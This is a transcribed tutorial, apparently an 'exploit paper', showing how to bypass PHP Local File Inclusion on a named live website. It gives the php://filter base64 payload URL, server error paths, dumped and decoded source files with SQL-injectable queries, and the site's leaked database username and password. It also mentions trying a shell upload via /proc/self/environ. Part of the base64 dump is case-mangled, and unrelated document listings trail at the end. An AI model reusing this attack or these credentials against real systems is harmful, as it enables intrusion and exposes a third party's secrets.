Hello friends, This is Aaditya Purani and i will show you how to Bypass PHP LFI(Local File Inclusion)

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "Hello friends, This is Aaditya Purani and i will show you how to Bypass PHP LFI(Local File Inclusion)"

Transcription

1 #Title: PHP LFI Bypass #Date : 12-July-2015 #Tested on: Kali Linux/ Windows 7 #Category : Papers #Exploit Author : Aaditya Purani Hello friends, This is Aaditya Purani and i will show you how to Bypass PHP LFI(Local File Inclusion) In this tutorial i am going to give you a url to show you how this works and how to bypass openbase dir restriction etc. It doesn't work always, but if you do perfect encoding then it will work. Example of base 64 encode file out (php://filter/convert.base64-encode/resource=index.php&top=home) #POC: URl (200)ok ERRROR Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129 Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129 Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129 Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129 Warning: include() [function.include]: Failed opening '../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line

2 URL THAT TRIGGERED ERROR ======================================== Now We See what we can do here 1.)http://mistflard.nl/index.php?page=php://filter/convert.base64- encode/resource=index.php ========================================= 2.)base 64 encoded response PD9waHAgCnJlcXVpcmUgInByZXBlbmQucGhwIjsgCiRsb2dpbj0kX0dFVFsnbG9naW4nXTsKP z4kpcfet0nuwvbfigh0bwwgufvcteldicitly9xm0mvl0rurcbysfrntcaxljagvhjhbnnpdg lvbmfsly9ftiigimh0dha6ly93d3cudzmub3jnl1rsl3hodg1sms9eveqvegh0bwwxlxryyw5 zaxrpb25hbc5kdgqipgo8ahrtbcb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmtk5os94ahrt bci+cjxozwfkpgo8bwv0ysbodhrwlwvxdwl2psjdb250zw50lvr5cguiignvbnrlbnq9inrle HQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPG1ldGEgIG5hbWUgPSAidmlld3BvcnQiIGNvbn RlbnQgPSAid2lkdGg9MTAyNCIgLz4KPGxpbmsgaHJlZj0ic3RpamwuY3NzIiByZWw9InN0eWx lc2hlzxqiihr5cgu9inrlehqvy3nziiavpgo8is0tw2lmielfidzdpia8bgluaybocmvmpsjz dglqbdeuy3nziibyzww9inn0ewxlc2hlzxqiihr5cgu9inrlehqvy3nzij48ivtlbmrpzl0tl T4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSIvZmF2aWNvbi5pY28iIC8+Cjx0aX RsZT5taXN0ZmxhcmQ8L3RpdGxlPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3J jpsjtzduuanmipjwvc2nyaxb0pgo8c2nyaxb0igxhbmd1ywdlpsjqyxzhc2nyaxb0ij4kznvu Y3Rpb24gcGFzc1Jlc3BvbnNlKCkgewp2YXIgdXNlcl9lbGVtZW50ID0gZG9jdW1lbnQubG9na W4udXNlcl90ZW1wLnZhbHVlOyAvLyBkb2N1bWVudC5oZm9ybS51c2VyLnZhbHVlIAogIC8vZG 9jdW1lbnQuaGZvcm0ucGFzcy52YWx1ZQpwYXNzPXVzZXJfZWxlbWVudCtkb2N1bWVudC5sb2d pbi5wyxnzx3rlbxaudmfsdwu7cmrvy3vtzw50lmxvz2lulnbhc3nfdgvtcc52ywx1zsa9icii Owp3YWNodDE9TUQ1KHBhc3MpLnRvTG93ZXJDYXNlKCk7CnBhc3M9IiI7Cjw/cGhwICRwYXJhP W1pY3JvdGltZSgxKSoxMDAwOyA/PgpidWZmPXdhY2h0MSs8P3BocCBlY2hvICRwYXJhOyA/Pj sgcndhy2h0mj1nrduoynvmzikudg9mb3dlcknhc2uoktskzg9jdw1lbnquagzvcm0udxnlci5 2YWx1ZT11c2VyX2VsZW1lbnQ7CmRvY3VtZW50Lmhmb3JtLnBhc3N3b3JkLnZhbHVlPXdhY2h0 MjsKZG9jdW1lbnQuaGZvcm0uY29kZS52YWx1ZT08P3BocCBlY2hvICRwYXJhOyA/PjsKZG9jd W1lbnQuaGZvcm0uc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHk+CjxkaXYgaW Q9Ik1haW4iPgo8ZGl2IGlkPSJIb29mZCI+CjxkaXYgaWQ9ImxvZ2luIj4KPD9waHAKaWYgKCR fu0vtu0lptlsndxnlciddpt1udwxskqp7cmlmicgkbg9naw49ptepigvjag8gijxhighyzwy9 J2luZGV4LnBocD9wYWdlPWhvbWUucGhwJmxvZ2luPTAnIHRpdGxlPSdnYSB0ZXJ1Zyc+PGltZ ybzcmm9j2ltywdlcy9rbm9wes5nawynigfsdd0ndwl0jybzdhlszt0nym9yzgvyojanlz48l2 E+IjsgZWxzZSBlY2hvICI8YSBocmVmPSdpbmRleC5waHA/cGFnZT1pbmxlaWRpbmdhZG1pbi5 wahambg9naw49mscgpjxpbwcgc3jjpsdpbwfnzxmva25vchguz2lmjybhbhq9j2fhbicgc3r5 bgu9j2jvcmrlcjowjy8+pc9hpii7cmlmicgkbg9naw4hptepcnskaw5jbhvkzsaiy29udhjvb GUucGhwIjsKZWNobyAiPHRhYmxlPjx0cj4iOwplY2hvICI8dGQ+Z2VicnVpa2Vyc25hYW06PC 90ZD48dGQ+d2FjaHR3b29yZDo8L3RkPjwvdHI+IjsKZWNobyAiPHRyPjxmb3JtIGFjdGlvbj0 nbg9naw4ucghwjybtzxrob2q9j3bvc3qnpii7cmvjag8gijx0zd48aw5wdxqgdhlwzt0ndgv4 dccgbmftzt0ndxnlcm5hbwunihzhbhvlpscnihn0ewxlpsd3awr0ado4n3b4o2hlawdoddoxm nb4o2zvbnqtc2l6ztoxmxb4jy8+pc90zd4iowply2hvici8dgq+pgluchv0ihr5cgu9j3bhc3 N3b3JkJyBuYW1lPSdwYXNzd29yZCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h 0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9 J2hpZGRlbicgbmFtZT0nY29kZScgdmFsdWU9JHBhcmEgPjwvdGQ+IjsKZWNobyAiPHRkPjxpb nb1dcb0exblpsdzdwjtaxqnig5hbwu9j3n1ym1pdej1dhrvbicgdmfsdwu9j2xvz2lujybjbg

3 Fzcz0na25vcDEnLz48L3RkPiI7CmVjaG8gIjwvZm9ybT4gIjsKfSBlbHNlCnsKZWNobyAnPGZ vcm0gbmftzt0ibg9naw4ipic7cmvjag8gjzx0ywjszt48dhi+phrkpmdlynj1awtlcnnuywft OjwvdGQ+PHRkPndhY2h0d29vcmQ6PC90ZD48L3RyPic7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZ T0ndGV4dCcgbmFtZT0ndXNlcl90ZW1wJyB2YWx1ZT0nJyBzdHlsZT0nd2lkdGg6ODdweDtoZW lnahq6mtjwedtmb250lxnpemu6mtfweccglz48l3rkpii7cmvjag8gijx0zd48aw5wdxqgdhl wzt0ncgfzc3dvcmqnig5hbwu9j3bhc3nfdgvtcccgdmfsdwu9jycgc3r5bgu9j3dpzhroojg3 chg7agvpz2h0ojeychg7zm9udc1zaxplojexchgnic8+pc90zd4iowply2hvicc8dgq+pgluc HV0IG9uQ2xpY2s9InBhc3NSZXNwb25zZSgpOyByZXR1cm4gZmFsc2U7IiB0eXBlPSJzdWJtaX QiIG5hbWU9InN1Ym1pdGJ0biIgdmFsdWU9IkxvZ2luIHZlaWxpZyIgIGNsYXNzPSJrbm9wMiI +PC90ZD4nOwplY2hvICc8L2Zvcm0+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSJsb2dpbnZlaWxp Zy5waHAiIE1FVEhPRD0iUE9TVCIgbmFtZT0iaGZvcm0iPic7CmVjaG8gJzxpbnB1dCB0eXBlP SJoaWRkZW4iIG5hbWU9InVzZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbW U9InBhc3N3b3JkIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjb2RlIj4 nowply2hvicc8l2zvcm0+jzskfqp9igvsc2ukewply2hvici8aw1nihnyyz0naw1hz2vzl2tu b3b6lmdpzicgywx0pscnihn0ewxlpsdib3jkzxi6mccvpjwvyt4iowokdxnlcj0kx1nfu1njt 05bJ3VzZXInXTsKZWNobyAiPHRhYmxlPjx0cj48dGQgc3R5bGU9J3dpZHRoOjIyMHB4Jz4kdX NlciBpcyBpbmdlbG9nZC48L3RkPjwvdHI+IjsKZWNobyAiPHRyPjx0ZD48Zm9ybSBhY3Rpb24 9J2xvZ3VpdC5waHAnIG1ldGhvZD0ncG9zdCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0n c3vimmenihzhbhvlpsdsb2d1axqnignsyxnzpsdrbm9wmscgdgl0bgu9j3vpdgxvz2dlbicvp ii7cmvjag8gijwvzm9ybt48l3rkpii7icagly8opgegahjlzj0ibg9ndwl0lnbocci+tg9ndw l0pc9hpikkiap9cmlmicgojf9trvntsu9owyd1c2vyj109pw51bgwpicymicgkbg9naw4hpte pkqp7cmvjag8gijxmb3jtigfjdglvbj0naw5kzxgucghwp3bhz2u9cghwl2zvcnvtl21lbgrh YW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0J ybuyw1lpsdzdwjtaxrcdxr0b24nihzhbhvlpsdpbnnjahjpanzlbicgy2xhc3m9j2tub3ayjy 8+IjsKZWNobyAiPC90ZD48L2Zvcm0+IjsKZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA /cgfnzt1wahavzm9ydw0vdmvyz2v0zw4ucghwjybtzxrob2q9j3bvc3qnpii7cmvjag8gijx0 ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWIyJyB2YWx1ZT0nPycgY2xhc3M9J2tub 3AwJyB0aXRsZT0nd2FjaHR3b29yZCB2ZXJnZXRlbj8nLz4iOwplY2hvICI8L3RkPjwvZm9ybT 4iOwp9IGVsc2UgaWYgKCRsb2dpbiE9MSkKewplY2hvICI8Zm9ybSBhY3Rpb249J2luZGV4LnB ocd9wywdlpxbocc9mb3j1bs9zy2hyawpmdwl0lnbocccgbwv0ag9kpsdwb3n0jz4ioybly2hv Ijx0ZCBzdHlsZT0nd2lkdGg6MTI4cHgnPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlP SdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J3VpdHNjaHJpanZlbicgY2xhc3 M9J2tub3AyJy8+IjsKZWNobyAiPGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0ndXNlcm5hYW0 nihzhbhvlpvwijhvzzxjcij4iowply2hvici8l3rkpjwvzm9ybt4iowogawygkcr1c2vypt0n YWRtaW4nKQogewogZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9yd W0vaW5zdGVsbGluZ2VuLnBocCcgbWV0aG9kPSdwb3N0Jz4iOwogZWNobyAiPHRkPjxpbnB1dC B0eXBlPSdzdWJtaXQnIG5hbWU9J3N1YnN0ZWxpbicgdmFsdWU9J0luLicgY2xhc3M9J2tub3A wjyb0axrszt0nsw5zdgvsbgluz2vujy8+ijskigvjag8gijwvdgq+pc9mb3jtpii7cib9ciak fsbly2hvici8l3rypjwvdgfibgu+pc9kaxy+ijsgly8gzwluzgugbg9naw4kjhzvcm0xpscno yr2b3jtmj0njzskdm9ybtm9jyc7jhzvcm00pscnoyr2b3jtnt0njzskdm9ybty9jyc7cmlmic hpc3nldcgkx0dfvfsncgfnzsddkskkicagicrwywdlid0gjf9hrvrbj3bhz2unxtskzwxzzsa kcgfnzsa9icjpbmxlawrpbmcucghwijsgcmlmicgkcgfnzt09imlubgvpzgluzy5wahaiksag IHskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJpbmxlaWRpbmdhZG1pbi5waHAiK Xskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJob21lLnBocCIpICAgICAgICB7JH Zvcm0yPSdibG9rJzt9IGVsc2UKaWYgKCRwYWdlPT0idG9lbGljaHRpbmcucGhwIikgeyR2b3J tmz0nymxvayc7fsblbhnlcmlmicgkcgfnzt09imzvcnvtcmvnzwxzlnboccipihskdm9ybtq9 J2Jsb2snO30gZWxzZQppZiAoKCRwYWdlPT0iY29udGFjdC5waHAiKSB8fCAoJHBhZ2U9PSJlZ m9ybs5wahaiksb8fcaojhbhz2u9psjtywlslnboccipickgeyr2b3jtnt0nymxvayc7fsblbh NlIHskdm9ybTI9J2Jsb2snOyB9Cj8+CjwvZGl2PiA8IS0tZWluZGUgSG9vZmQtLT4KPGRpdiB jbgfzcz0ibwvudsi+cia8zgl2ignsyxnzpsjob3zlcm1lbnuipgogphvspgogpgxpiglkpsi8 P3BocCBlY2hvICR2b3JtMTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWlubGVpZGluZ y5wahaiihrpdgxlpsjjbmxlawrpbmcipjxzcgfupklubgvpzgluzzwvc3bhbj48l2e+pc9sat 4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTI7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGF nzt1ob21llnboccigdgl0bgu9ikzvcnvtij48c3bhbj5gb3j1btwvc3bhbj48l2e+pc9sat4k

4 IDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTM7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZ T10b2VsaWNodGluZy5waHAiIHRpdGxlPSIiPjxzcGFuPlRvZWxpY2h0aW5nPC9zcGFuPjwvYT 48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNDsgPz4iPjxhIGhyZWY9ImluZGV4LnB ocd9wywdlpwzvcnvtcmvnzwxzlnboccigdgl0bgu9iii+phnwyw4+rm9ydw0gcmvnzwxzpc9z cgfupjwvyt48l2xppgogpgxpiglkpsi8p3boccbly2hvicr2b3jtntsgpz4ipjxhighyzwy9i mluzgv4lnbocd9wywdlpwnvbnrhy3qucghwiib0axrszt0iij48c3bhbj5db250ywn0pc9zcg FuPjwvYT48L2xpPgogPC91bD4KPC9kaXY+CjwvZGl2Pgo8ZGl2IGNsYXNzPSJiYWxrIj48IS0 tihzvb3igsuugniatlt48l2rpdj4kpd9wahakawygkglzc2v0kcrfr0vuwydwywdlj10pkqog ICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOwplbHNlICRwYWdlID0gImlubGVpZGluZy5waHAiO yakpz4kpd9wahakzwnobyi8zgl2iglkpsddb250zw50jz4iowppziaokcrwywdlpt0iaw5szw lkaw5nywrtaw4ucghwiikgjiygkcrfu0vtu0lptlsndxnlciddit1udwxskskgjhbhz2u9iml ubgvpzgluzy5wahaiowppbmnsdwrlicrwywdloyakzwnobyaipc9kaxy+ijsglyplaw5kzsbj b250zw50icovcj8+cjxkaxygawq9ilzvzxqipgo8p3bocapzzxrsb2nhbguotenfvelnrswnb mxftkwnlcdubccsj2r1jyk7cmvjag8gijxkaxygc3r5bgu9j21hcmdpbi1szwz0ojywmhb4o2 1hcmdpbi10b3A6MTBweDsnPiIuJ1BhZ2luYSBnZW9wZW5kOiAnLCBzdHJmdGltZSgiJUg6JU0 6JVMgJUEgJWQgJUIgJVkiLCBta3RpbWUoKSksJzwvZGl2Pic7Cj8+CjwvZGl2Pgo8L2Rpdj4g PCEtLWVpbmRlIG1haW4tLT4KCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdmFyI GdhSnNIb3N0ID0gKCgiaHR0cHM6IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPy AiaHR0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOwpkb2N1bWVudC53cml0ZSh1bmVzY2F wzsgijtndc2nyaxb0ihnyyz0niiarigdhsnnib3n0icsgimdvb2dszs1hbmfsexrpy3muy29t L2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsKPC9zY 3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdHJ5ewp2YXIgcGFnZVRyYW NrZXIgPSBfZ2F0Ll9nZXRUcmFja2VyKCJVQS0xNzUwODA1Ny0xIik7CnBhZ2VUcmFja2VyLl9 0cmFja1BhZ2V2aWV3KCk7Cn0gY2F0Y2goZXJyKSB7fQo8L3NjcmlwdD4KCjwvYm9keT4KPC9o dg1s Decoded Response require "prepend.php"; $login=$_get['login']; <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name = "viewport" content = "width=1024" /> <link href="stijl.css" rel="stylesheet" type="text/css" /> <!--[if IE 6]> <link href="stijl1.css" rel="stylesheet" type="text/css"><![endif]--> <link rel="shortcut icon" href="/favicon.ico" /> <title>mistflard</title> <script type="text/javascript" src="md5.js"></script> <script language="javascript"> function passresponse() var user_element = document.login.user_temp.value; // document.hform.user.value //document.hform.pass.value pass=user_element+document.login.pass_temp.value; document.login.pass_temp.value = "";

5 wacht1=md5(pass).tolowercase(); pass=""; $para=microtime(1)*1000; buff=wacht1+ echo $para; ; wacht2=md5(buff).tolowercase(); document.hform.user.value=user_element; document.hform.password.value=wacht2; document.hform.code.value= echo $para; ; document.hform.submit(); </script> </head> <body> <div id="main"> <div id="hoofd"> <div id="login"> if ($_SESSION['user']==null) if ($login==1) echo "<a href='index.php?page=home.php&login=0' title='ga terug'><img src='images/knopy.gif' alt='uit' style='border:0'/></a>"; else echo "<a href='index.php?page=inleidingadmin.php&login=1' ><img src='images/knopx.gif' alt='aan' style='border:0'/></a>"; if ($login!=1) include "controle.php"; echo "<table><tr>"; echo "<td>gebruikersnaam:</td><td>wachtwoord:</td></tr>"; echo "<tr><form action='login.php' method='post'>"; echo "<td><input type='text' name='username' value='' style='width:87px;height:12px;font-size:11px'/></td>"; echo "<td><input type='password' name='password' value='' style='width:87px;height:12px;font-size:11px' /></td>"; echo "<td><input type='hidden' name='code' value=$para ></td>"; echo "<td><input type='submit' name='submitbutton' value='login' class='knop1'/></td>"; echo "</form> "; else echo '<form name="login">'; echo '<table><tr><td>gebruikersnaam:</td><td>wachtwoord:</td></tr>'; echo "<td><input type='text' name='user_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>"; echo "<td><input type='password' name='pass_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>"; echo '<td><input onclick="passresponse(); return false;" type="submit" name="submitbtn" value="login veilig" class="knop2"></td>'; echo '</form>'; echo '<form action="loginveilig.php" METHOD="POST" name="hform">'; echo '<input type="hidden" name="user">'; echo '<input type="hidden" name="password">'; echo '<input type="hidden" name="code">'; echo '</form>';

6 else echo "<img src='images/knopz.gif' alt='' style='border:0'/></a>"; $user=$_session['user']; echo "<table><tr><td style='width:220px'>$user is ingelogd.</td></tr>"; echo "<tr><td><form action='loguit.php' method='post'><input type='submit' name='sub2a' value='loguit' class='knop1' title='uitloggen'/>"; echo "</form></td>"; //(<a href="loguit.php">loguit</a>) if (($_SESSION['user']==null) && ($login!=1)) echo "<form action='index.php?page=php/forum/meldaan.php' method='post'>"; echo "<td><input type='submit' name='submitbutton' value='inschrijven' class='knop2'/>"; echo "</td></form>"; echo "<form action='index.php?page=php/forum/vergeten.php' method='post'>"; echo "<td><input type='submit' name='sub2' value='?' class='knop0' title='wachtwoord vergeten?'/>"; echo "</td></form>"; else if ($login!=1) echo "<form action='index.php?page=php/forum/schrijfuit.php' method='post'>"; echo"<td style='width:128px'></td>"; echo "<td><input type='submit' name='submitbutton' value='uitschrijven' class='knop2'/>"; echo "<input type='hidden' name='usernaam' value=\"$user\">"; echo "</td></form>"; if ($user=='admin') echo "<form action='index.php?page=php/forum/instellingen.php' method='post'>"; echo "<td><input type='submit' name='substelin' value='in.' class='knop0' title='instellingen'/>"; echo "</td></form>"; echo "</tr></table></div>"; // einde login $vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5='';$vorm6=''; if (isset($_get['page'])) $page = $_GET['page']; else $page = "inleiding.php"; if ($page=="inleiding.php") $vorm1='blok'; else if ($page=="inleidingadmin.php")$vorm1='blok'; else if ($page=="home.php") $vorm2='blok'; else if ($page=="toelichting.php") $vorm3='blok'; else if ($page=="forumregels.php") $vorm4='blok'; else if (($page=="contact.php") ($page=="eform.php") ($page=="mail.php") ) $vorm5='blok'; else $vorm2='blok'; </div> <!--einde Hoofd-->

7 <div class="menu"> <div class="hovermenu"> <ul> <li id=" echo $vorm1; "><a href="index.php?page=inleiding.php" title="inleiding"><span>inleiding</span></a></li> <li id=" echo $vorm2; "><a href="index.php?page=home.php" title="forum"><span>forum</span></a></li> <li id=" echo $vorm3; "><a href="index.php?page=toelichting.php" title=""><span>toelichting</span></a></li> <li id=" echo $vorm4; "><a href="index.php?page=forumregels.php" title=""><span>forum regels</span></a></li> <li id=" echo $vorm5; "><a href="index.php?page=contact.php" title=""><span>contact</span></a></li> </ul> </div> </div> <div class="balk"><!-- voor IE 6 --></div> if (isset($_get['page'])) $page = $_GET['page']; else $page = "inleiding.php"; echo"<div id='content'>"; if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php"; include $page; echo "</div>"; /*einde content */ <div id="voet"> setlocale(lc_time,'nl_nl','nl','du'); echo "<div style='margin-left:600px;margin-top:10px;'>".'pagina geopend: ', strftime("%h:%m:%s %A %d %B %Y", mktime()),'</div>'; </div> </div> <!--einde main--> <script type="text/javascript"> var gajshost = (("https:" == document.location.protocol)? "https://ssl." : "http://www."); document.write(unescape("%3cscript src='" + gajshost + "googleanalytics.com/ga.js' type='text/javascript'%3e%3c/script%3e")); </script> <script type="text/javascript"> try var pagetracker = _gat._gettracker("ua "); pagetracker._trackpageview(); catch(err) </script> </body> </html

8 4.)Now we move on to see if we can root the box or atleast get a shell uploaded now they have open base dir restriction in effect so i highly doubt we can upload a shell via proc/self/environ but we can try it. 5.)So i grab prepend.php and decode its contents as well,using opionated geeks base 64 decoder online and got the following prepend.php session_start(); require_once "MyDB.class.php"; require_once "php/login/versio.inc.php"; function check_ip($ip) $mydb= new MyDB(); $sql="select * FROM blokkeer Where ip='$ip'"; $result=$mydb->doquery($sql); if (mysql_num_rows($result) == 0) return true; else $vandaag=date("y-m-d"); $line = $mydb->fetch($result); $datum=$line[2]; $reden=$line[4]; setlocale(lc_time,'nl_nl','nl','du'); $refa1=strpos($datum,'-'); $refa2=strripos($datum,'-'); $jaara=substr($datum,0,$refa1); $daga=substr($datum,($refa2+1),2); $maanda=substr($datum,($refa1+1),2); $dat=strftime("%a %d %B %Y", mktime(0, 0, 0, $maanda, $daga, $jaara)); if ($datum>$vandaag) echo "De toegang tot deze functie is u ontzegd, IP-adres geblokkeerd tot ".$dat; if (($reden!='') && ($reden!=null)) echo "<br>wegens: ".$reden; echo '<br><br>keer terug naar de begin pagina.'; echo '<table><tr></tr><tr>'; echo '<form action="index.php?page=home.php" method="post">'; echo '<td><input type="submit" value="ok" class="verstuur"></td>'; echo '</form></tr></table>'; return false; else return true; function check_mail($user)

9 $mydb= new MyDB(); $sql="select veri FROM WebUser Where username='$user'"; $result=$mydb->doquery($sql); $line = $mydb->fetch($result); if ($line[0] == 1) return true; else return false; function check_auth_user3($user,$authorization) // nieuwe functie met extra controles $sx=false; $mydb= new MyDB(); $sql = "Select sessionid,ip from WebUser where username='$user'"; //echo $sql; $result=$mydb->doquery($sql); if (mysql_num_rows($result) >0) $line = $mydb->fetch($result); $sessionid=$line[0]; $ip=$line[1]; $ipref=$_server['remote_addr']; $len=strlen($_session['session_id']); $sw=false; // sessieid voldoet niet if (($sessionid==$_session['session_id']) && ($len==50) ) $sw=true; else echo "Geen toegang: Sessionid klopt niet.<br>".$_session['session_id']."<br>".$sessionid."<br>". $_SESSION['error_message']."<br>"; return false; if (($sw) && ($ip==$ipref)) $sx=true; else echo "Geen toegang: Inlog-IPadres verschilt van huidig IP-adres.<br>"; return false; // username voldoet niet else echo "Geen toegang: Log eerst in a.u.b.<br>"; return false; // username voldoet niet if (($user) && ($sx)) $query = "select * from UserAuthorization where username = '"."$user"."' and authorization='"."$authorization"."' "; $result=$mydb->doquery($query); if (mysql_num_rows($result) >0) return true; else echo "U bent niet geautoriseerd om deze pagina te openen.<br>"; return false; // autorisatie voldoet niet else return false; // geen usename function check_auth_user4($user,$authorization) // nieuwe functie met extra controles zelfde functie als 3 maar dan zonder tekstmelding $sx=false; $mydb= new MyDB();

10 $sql = "Select sessionid,ip from WebUser where username='$user'"; //echo $sql; $result=$mydb->doquery($sql); if (mysql_num_rows($result) >0) $line = $mydb->fetch($result); $sessionid=$line[0]; $ip=$line[1]; $ipref=$_server['remote_addr']; $len=strlen($_session['session_id']); $sw=false; if (($sessionid==$_session['session_id']) && ($len==50) ) $sw=true; else return false; // sessieid voldoet niet if (($sw) && ($ip==$ipref)) $sx=true; else return false; // ip voldoet niet else return false; // username voldoet niet if (($user) && ($sx)) $query = "select * from UserAuthorization where username = '"."$user"."' and authorization='"."$authorization"."' "; $result=$mydb->doquery($query); if (mysql_num_rows($result) >0) return true; else return false; // autorisatie voldoet niet else return false; // geen usename function check_auth_user5($user,$session,$authorization) //functie voor aparte controle om na verloop sessie toch nog geldige submit te kunnen doen. $sx=false; $mydb= new MyDB(); $sql = "Select sessionid,ip from WebUser where username='$user'"; //echo $sql; $result=$mydb->doquery($sql); if (mysql_num_rows($result) >0) $line = $mydb->fetch($result); $sessionid=$line[0]; $ip=$line[1]; $ipref=$_server['remote_addr']; $len=strlen($session); $sw=false; if ( ($sessionid==$session) && ($len==50) ) $sw=true; echo "Check_auth_user5 succesvol uitgevoerd<br>"; else return false; // sessieid voldoet niet if (($sw) && ($ip==$ipref)) $sx=true; else return false; // ip voldoet niet else return false; // username voldoet niet

11 if (($user) && ($sx)) $query = "select * from UserAuthorization where username = '"."$user"."' and authorization='"."$authorization"."' "; $result=$mydb->doquery($query); if (mysql_num_rows($result) >0) return true; else return false; // autorisatie voldoet niet else return false; // geen usename? )That wasn't easy but you can also extract the configuration.php / config.php file too. ==================== login info ==================== define(host, "localhost"); define(username,"jthkrgfw_beheer"); define(password,"w15129"); define(database,"jthkrgfw_mistflard"); and to top it off they block access from outside to the mysql server so what are we to do So this is how you bypass PHP based LFI in a case where direct query is blocked. Thank you.

Agenda. 1. ZAPms Konzept. 2. Benutzer-Kontroller. 3. Laout-Aufbau. 4. Template-Aufbau. 6. Konfiguration. 7. Module.

Agenda. 1. ZAPms Konzept. 2. Benutzer-Kontroller. 3. Laout-Aufbau. 4. Template-Aufbau. 6. Konfiguration. 7. Module. Agenda. ZAPms Konzept.. Benutzer-Kontroller.. Laout-Aufbau.. Template-Aufbau. 5. Bildergalerie (Beispiel). 6. Konfiguration. 7. Module. . ZAPms Konzept Benutzer Web Server Benutzer-Kontroller www.domain/index.php

More information

Chapter 1 Introduction to web development and PHP

Chapter 1 Introduction to web development and PHP Chapter 1 Introduction to web development and PHP Murach's PHP and MySQL, C1 2010, Mike Murach & Associates, Inc. Slide 1 Objectives Applied 1. Use the XAMPP control panel to start or stop Apache or MySQL

More information

ShoreTel Enterprise Contact Center 8 Installing and Implementing Chat

ShoreTel Enterprise Contact Center 8 Installing and Implementing Chat ShoreTel Enterprise Contact Center 8 Installing and Implementing Chat November 2012 Legal Notices Document and Software Copyrights Copyright 1998-2012 by ShoreTel Inc., Sunnyvale, California, USA. All

More information

Web Application Security Part 1

Web Application Security Part 1 Web Application Security Part 1 Author : Treasure Priyamal Site : www.treasuresec.com E-mail : treasure@treasuresec.com Twitter :http://twitter.com/treasure_sec Introduction Today we are going to talk

More information

Joomla 1.0 Extension Development Training. Learning to program for Joomla

Joomla 1.0 Extension Development Training. Learning to program for Joomla Joomla 1.0 Extension Development Training Learning to program for Joomla Objectives & Requirements Learn to develop basic Joomla Mambots, Modules and Components. Familiar with PHP and MySQL programming.

More information

.NET Best Practices Part 1 Master Pages Setup. Version 2.0

.NET Best Practices Part 1 Master Pages Setup. Version 2.0 .NET Best Practices Part 1 Master Pages Setup Version 2.0 2014 CrownPeak Technology, Inc. All rights reserved. No part of this document may be reproduced or transmitted in any form or by any means, electronic

More information

GEMFIND. We Handle The Journey. So You Can Focus On The Destination. WEB TECHNOLOGIES FOR THE JEWELRY INDUSTRY - Est. 1999

GEMFIND. We Handle The Journey. So You Can Focus On The Destination. WEB TECHNOLOGIES FOR THE JEWELRY INDUSTRY - Est. 1999 GEMFIND WEB TECHNOLOGIES FOR THE JEWELRY INDUSTRY - Est. 1999 We Handle The Journey So You Can Focus On The Destination COMPANY Your Jewelry Technology Team We Handle Your Entire Digital Experience WEB

More information

Web Development Guide. Information Systems

